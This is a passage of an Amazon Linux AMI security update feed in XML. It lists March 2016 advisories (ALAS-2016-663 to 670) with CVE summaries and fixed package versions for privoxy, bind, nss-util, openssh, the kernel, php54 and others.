AMI 2014.03 - ALAS-2016-663: medium priority package update for privoxy</title><issued date="2016-03-10 16:30:00" /><updated date="2016-03-10 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon 
Linux AMI that fix the following vulnerabilities:
CVE-2016-1983:
The client_host function in parsers.c in Privoxy before 3.0.24 allows remote attackers to cause a denial of service (invalid read and crash) via an empty HTTP Host header.
1300972:
CVE-2016-1983 privoxy: invalid read via empty host header in client request
CVE-2016-1982:
The remove_chunked_transfer_coding function in filters.c in Privoxy before 3.0.24 allows remote attackers to cause a denial of service (invalid read and crash) via crafted chunk-encoded content.
1300966:
CVE-2016-1982 privoxy: invalid reads in case of corrupt chunk-encoded content
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1982" title="" id="CVE-2016-1982" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1983" title="" id="CVE-2016-1983" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="privoxy" version="3.0.23" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/privoxy-3.0.23-2.7.amzn1.x86_64.rpm</filename></package><package name="privoxy-debuginfo" version="3.0.23" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/privoxy-debuginfo-3.0.23-2.7.amzn1.x86_64.rpm</filename></package><package name="privoxy" version="3.0.23" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/privoxy-3.0.23-2.7.amzn1.i686.rpm</filename></package><package name="privoxy-debuginfo" version="3.0.23" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/privoxy-debuginfo-3.0.23-2.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-664</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-664: important priority package update for 389-ds-base</title><issued date="2016-03-10 16:30:00" /><updated date="2016-03-10 16:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0741:
An infinite-loop vulnerability was discovered in the 389 directory server, where the server failed to correctly handle unexpectedly closed client connections. A remote attacker able to connect to the server could use this flaw to make the directory server consume an excessive amount of CPU and stop accepting connections (denial of service).
1299416:
CVE-2016-0741 389-ds-base: worker threads do not detect abnormally closed connections causing DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0741" title="" id="CVE-2016-0741" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base" version="1.3.4.0" release="26.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.4.0-26.47.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.4.0" release="26.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.4.0-26.47.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.4.0" release="26.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.4.0-26.47.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.4.0" release="26.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.4.0-26.47.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.4.0" release="26.47.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.4.0-26.47.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.4.0" release="26.47.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.4.0-26.47.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.4.0" release="26.47.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.4.0-26.47.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.4.0" release="26.47.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.4.0-26.47.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-665</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-665: important priority package update for bind</title><issued date="2016-03-10 
16:30:00" /><updated date="2016-03-10 16:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-1286:
An error when parsing signature records for DNAME records having specific properties can lead to named exiting due to an assertion failure in resolver.c or db.c. An attacker able to cause a server to make a query deliberately chosen to generate a malicious response can cause named to stop execution with an assertion failure, resulting in denial of service to clients.
CVE-2016-1285:
A defect in control channel input handling was discovered which can cause named to exit due to an assertion failure in sexpr.c or alist.c when a malformed packet is sent to named's control channel. If control channel input is accepted from the network (limited to localhost by default), an unauthenticated attacker could cause named to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1285" title="" id="CVE-2016-1285" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1286" title="" id="CVE-2016-1286" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-devel" version="9.8.2" release="0.37.rc1.45.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.37.rc1.45.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.37.rc1.45.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.37.rc1.45.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.37.rc1.45.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.37.rc1.45.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.37.rc1.45.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.37.rc1.45.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.37.rc1.45.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.37.rc1.45.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.37.rc1.45.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.37.rc1.45.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.37.rc1.45.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.37.rc1.45.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.37.rc1.45.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.37.rc1.45.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.37.rc1.45.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.37.rc1.45.amzn1.i686.rpm</filename></package><package name="bind-devel" 
version="9.8.2" release="0.37.rc1.45.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.37.rc1.45.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.37.rc1.45.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.37.rc1.45.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.37.rc1.45.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.37.rc1.45.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.37.rc1.45.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.37.rc1.45.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.37.rc1.45.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.37.rc1.45.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-666</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-666: medium priority package update for sos</title><issued date="2016-03-10 16:30:00" /><updated date="2016-03-10 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7529:
An insecure temporary file use flaw was found in the way sos created certain sosreport files. A local attacker could possibly use this flaw to perform a symbolic link attack to reveal the contents of sosreport files, or in some cases modify arbitrary files and escalate their privileges on the system.
1282542:
CVE-2015-7529 sos: Usage of predictable temporary files allows privilege escalation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7529" title="" id="CVE-2015-7529" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sos" version="3.2" release="28.17.amzn1" epoch="0" arch="noarch"><filename>Packages/sos-3.2-28.17.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-667</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-667: critical priority package update for nss-util</title><issued date="2016-03-10 16:30:00" /><updated date="2016-03-10 16:30:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-1950:
A heap-based buffer overflow flaw was found in the way NSS parsed certain ASN.1 structures. An attacker could use this flaw to create a specially crafted certificate which, when parsed by NSS, could cause it to crash, or execute arbitrary code, using the permissions of the user running an application compiled against the NSS library.
1310509:
CVE-2016-1950 nss: Heap buffer overflow vulnerability in ASN1 certificate parsing (MFSA 2016-35)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1950" title="" id="CVE-2016-1950" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-util" version="3.19.1" release="9.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-3.19.1-9.49.amzn1.x86_64.rpm</filename></package><package name="nss-util-devel" version="3.19.1" release="9.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-devel-3.19.1-9.49.amzn1.x86_64.rpm</filename></package><package name="nss-util-debuginfo" version="3.19.1" release="9.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-debuginfo-3.19.1-9.49.amzn1.x86_64.rpm</filename></package><package name="nss-util" version="3.19.1" release="9.49.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-3.19.1-9.49.amzn1.i686.rpm</filename></package><package name="nss-util-devel" version="3.19.1" release="9.49.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-devel-3.19.1-9.49.amzn1.i686.rpm</filename></package><package name="nss-util-debuginfo" version="3.19.1" release="9.49.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-debuginfo-3.19.1-9.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-668</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-668: medium priority package update for openssh</title><issued date="2016-03-16 16:30:00" /><updated date="2016-03-16 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3115:
1316829:
CVE-2016-3115 openssh: missing sanitisation of input for X11 forwarding
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3115" title="" id="CVE-2016-3115" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssh-keycat" version="6.6.1p1" release="23.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-6.6.1p1-23.60.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="9.23.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.9.3-9.23.60.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="6.6.1p1" release="23.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-6.6.1p1-23.60.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="6.6.1p1" release="23.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-6.6.1p1-23.60.amzn1.x86_64.rpm</filename></package><package name="openssh" version="6.6.1p1" release="23.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-6.6.1p1-23.60.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="6.6.1p1" release="23.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-6.6.1p1-23.60.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="6.6.1p1" release="23.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-6.6.1p1-23.60.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="6.6.1p1" release="23.60.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-6.6.1p1-23.60.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="6.6.1p1" release="23.60.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-6.6.1p1-23.60.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="6.6.1p1" release="23.60.amzn1" epoch="0" 
arch="i686"><filename>Packages/openssh-debuginfo-6.6.1p1-23.60.amzn1.i686.rpm</filename></package><package name="openssh" version="6.6.1p1" release="23.60.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-6.6.1p1-23.60.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="9.23.60.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.9.3-9.23.60.amzn1.i686.rpm</filename></package><package name="openssh-ldap" version="6.6.1p1" release="23.60.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-6.6.1p1-23.60.amzn1.i686.rpm</filename></package><package name="openssh-clients" version="6.6.1p1" release="23.60.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-6.6.1p1-23.60.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-669</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-669: medium priority package update for kernel</title><issued date="2016-03-16 16:30:00" /><updated date="2016-12-23 21:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3157:
An issue was discovered in the kernel running as a Xen 64-bit PV guest, where user-mode processes could be granted permission to I/O ports, resulting in local privilege escalation, crashes, or information leaks.
CVE-2016-2847:
1313428:
CVE-2016-2847 kernel: pipe: limit the per-user amount of pages allocated in pipes
CVE-2016-2550:
A resource-exhaustion vulnerability was found in the kernel, where an unprivileged process could allocate and accumulate far more file descriptors than the process&#039; limit. A local, unauthenticated user could exploit this flaw by sending file descriptors over a Unix socket and then closing them to keep the process&#039; fd count low, thereby causing kernel-memory or file-descriptor exhaustion (denial of service).
1311517:
CVE-2016-2550 kernel: incorrectly accounted in-flight fds
CVE-2016-2383:
1308452:
CVE-2016-2383 kernel: incorrect branch fixups for eBPF allow arbitrary read
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2383" title="" id="CVE-2016-2383" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2550" title="" id="CVE-2016-2550" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2847" title="" id="CVE-2016-2847" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3157" title="" id="CVE-2016-3157" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-debuginfo" version="4.1.19" release="24.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.1.19-24.31.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.1.19" release="24.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.1.19-24.31.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.1.19" release="24.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.1.19-24.31.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.1.19" release="24.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.1.19-24.31.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.1.19" release="24.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.1.19-24.31.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.1.19" release="24.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.1.19-24.31.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.1.19" release="24.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.1.19-24.31.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.1.19" release="24.31.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/perf-4.1.19-24.31.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.1.19" release="24.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.1.19-24.31.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.1.19" release="24.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.1.19-24.31.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.1.19" release="24.31.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.1.19-24.31.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.1.19" release="24.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.1.19-24.31.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.1.19" release="24.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.1.19-24.31.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.1.19" release="24.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.1.19-24.31.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.1.19" release="24.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.1.19-24.31.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.1.19" release="24.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.1.19-24.31.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.1.19" release="24.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.1.19-24.31.amzn1.i686.rpm</filename></package><package name="kernel" version="4.1.19" release="24.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.1.19-24.31.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.1.19" release="24.31.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-debuginfo-4.1.19-24.31.amzn1.i686.rpm</filename></package><package name="perf" version="4.1.19" release="24.31.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.1.19-24.31.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.1.19" release="24.31.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.1.19-24.31.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-670</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-670: low priority package update for php54</title><issued date="2016-03-16 16:30:00" /><updated date="2016-03-16 16:30:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-6838:
A NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed PHP functions to be used as XSLT functions within XSL stylesheets.
1260711:
CVE-2015-6837 CVE-2015-6838 php: NULL pointer dereference in XSLTProcessor class
CVE-2015-6837:
A NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed PHP functions to be used as XSLT functions within XSL stylesheets.
1260711:
CVE-2015-6837 CVE-2015-6838 php: NULL pointer dereference in XSLTProcessor class
CVE-2015-6836:
A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.
1260683:
CVE-2015-6836 php: SOAP serialize_function_call() type confusion
CVE-2015-6835:
1260647:
CVE-2015-6835 php: use-after-free vulnerability in session deserializer
CVE-2015-6834:
1260642:
CVE-2015-6834 php: multiple unserialization use-after-free issues
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6834" title="" id="CVE-2015-6834" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6835" title="" id="CVE-2015-6835" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6836" title="" id="CVE-2015-6836" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6837" title="" id="CVE-2015-6837" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6838" title="" id="CVE-2015-6838" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-debuginfo" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.45" release="1.75.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php54-imap-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" 
version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.45-1.75.amzn1.i686.rpm</filename></package><package 
name="php54-enchant" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.45-1.75.amzn1.i686.rpm</filename></package><package 
